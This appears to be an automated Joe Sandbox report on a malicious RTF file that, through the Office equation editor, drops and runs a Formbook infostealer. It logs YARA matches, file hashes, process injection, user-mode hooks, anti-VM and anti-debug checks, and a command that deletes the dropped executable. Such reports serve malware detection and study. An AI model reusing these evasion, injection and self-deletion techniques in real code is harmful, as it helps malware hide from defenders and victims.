          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exe 7C6393B4E86EA5CEC49C0F814B17E4BB85AA447C19896037252A94FF6416CE1B
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsxAB11.tmp\ghvea31n0uw.dll 974E158EA37951D137839D4189279330AA2E85F5BAFA4F273F7007673CD4D3FC
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\propser16364.exe 7C6393B4E86EA5CEC49C0F814B17E4BB85AA447C19896037252A94FF6416CE1B
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: String function: 0083E2A8 appears 37 times
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: String function: 0083DF5C appears 106 times
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: String function: 00883F92 appears 104 times
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: String function: 008AF970 appears 79 times
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: String function: 0088373B appears 214 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 00B0F970 appears 81 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 00A9DF5C appears 112 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 00AE3F92 appears 108 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 00AE373B appears 238 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 00A9E2A8 appears 38 times
          Source: 00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2343971435.0000000000200000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2343971435.0000000000200000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2343918572.00000000001B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2343918572.00000000001B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2090889243.0000000000450000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2090889243.0000000000450000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000001.2087019279.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000001.2087019279.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2121531163.0000000000270000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2121531163.0000000000270000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.propser16364.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.propser16364.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.propser16364.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.propser16364.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.propser16364.exe.450000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.propser16364.exe.450000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.propser16364.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.propser16364.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: explorer.exe, 00000006.00000000.2095904163.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winRTF@10/12@4/3
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 4_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403461
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 4_2_0040473E GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,4_2_0040473E
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 4_2_0040216B CoCreateInstance,MultiByteToWideChar,4_2_0040216B
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$080fbf_by_Libranalysis.rtfJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC38D.tmpJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\AppData\Roaming\propser16364.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: c8080fbf_by_Libranalysis.rtfVirustotal: Detection: 50%
          Source: c8080fbf_by_Libranalysis.rtfReversingLabs: Detection: 51%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\propser16364.exe C:\Users\user\AppData\Roaming\propser16364.exe
          Source: C:\Users\user\AppData\Roaming\propser16364.exeProcess created: C:\Users\user\AppData\Roaming\propser16364.exe C:\Users\user\AppData\Roaming\propser16364.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\propser16364.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\propser16364.exe C:\Users\user\AppData\Roaming\propser16364.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\propser16364.exeProcess created: C:\Users\user\AppData\Roaming\propser16364.exe C:\Users\user\AppData\Roaming\propser16364.exeJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\propser16364.exe'Jump to behavior
          Source: C:\Users\user\AppData\Roaming\propser16364.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: propser16364.exe, NAPSTAT.EXE
          Source: Binary string: napstat.pdb source: propser16364.exe, 00000005.00000002.2123186135.0000000002440000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\AppData\Roaming\propser16364.exeUnpacked PE file: 5.2.propser16364.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0040E8A7 push ds; retf 5_2_0040E8A8
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_004171BB push edx; iretd 5_2_004171BF
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_00417294 push ecx; iretd 5_2_00417295
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_00416B6B push ds; iretd 5_2_00416B72
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0040E3E0 push EC8EF736h; retf 5_2_0040E402
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_00417CB1 push esi; iretd 5_2_00417CB2
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_004085A2 push ebx; ret 5_2_004085A3
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0041CEB5 push eax; ret 5_2_0041CF08
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0041CF6C push eax; ret 5_2_0041CF72
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0041CF02 push eax; ret 5_2_0041CF08
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0041CF0B push eax; ret 5_2_0041CF72
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_00417726 push ss; retf 5_2_0041773E
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0040478A push eax; iretd 5_2_0040478F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A9DFA1 push ecx; ret 7_2_00A9DFB4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_000971BB push edx; iretd 7_2_000971BF
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00097294 push ecx; iretd 7_2_00097295
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0008E3E0 push EC8EF736h; retf 7_2_0008E402
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_000885A2 push ebx; ret 7_2_000885A3
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00097726 push ss; retf 7_2_0009773E
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0008478A push eax; iretd 7_2_0008478F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0008E8A7 push ds; retf 7_2_0008E8A8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00096B6B push ds; iretd 7_2_00096B72
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00097CB1 push esi; iretd 7_2_00097CB2
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0009CEB5 push eax; ret 7_2_0009CF08
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0009CF0B push eax; ret 7_2_0009CF72
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0009CF02 push eax; ret 7_2_0009CF08
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0009CF6C push eax; ret 7_2_0009CF72
          Source: C:\Users\user\AppData\Roaming\propser16364.exeFile created: C:\Users\user\AppData\Local\Temp\nsxAB11.tmp\ghvea31n0uw.dllJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\propser16364.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE2
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\propser16364.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Roaming\propser16364.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\propser16364.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NAPSTAT.EXERDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NAPSTAT.EXERDTSC instruction interceptor: First address: 0000000000089B5E second address: 0000000000089B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_00409A90 rdtsc 5_2_00409A90
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2680Thread sleep time: -300000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 2276Thread sleep count: 33 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 2276Thread sleep time: -66000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE TID: 3064Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2476Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 4_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_004059F0
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 4_2_0040659C FindFirstFileA,FindClose,4_2_0040659C
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 4_2_004027A1 FindFirstFileA,4_2_004027A1
          Source: explorer.exe, 00000006.00000000.2096466356.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.2091045872.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.2096487428.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: explorer.exe, 00000006.00000000.2096466356.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: propser16364.exe, 00000004.00000002.2090930540.00000000004D4000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: C:\Users\user\AppData\Roaming\propser16364.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\propser16364.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_00409A90 rdtsc 5_2_00409A90
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0040ACD0 LdrLoadDll,5_2_0040ACD0
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 4_2_10001000 mov eax, dword ptr fs:[00000030h]4_2_10001000
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 4_2_0044165A mov eax, dword ptr fs:[00000030h]4_2_0044165A
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 4_2_00441872 mov eax, dword ptr fs:[00000030h]4_2_00441872
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_008426F8 mov eax, dword ptr fs:[00000030h]5_2_008426F8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00AA26F8 mov eax, dword ptr fs:[00000030h]7_2_00AA26F8
          Source: C:\Users\user\AppData\Roaming\propser16364.exeProcess token adjusted: DebugJump to behavior
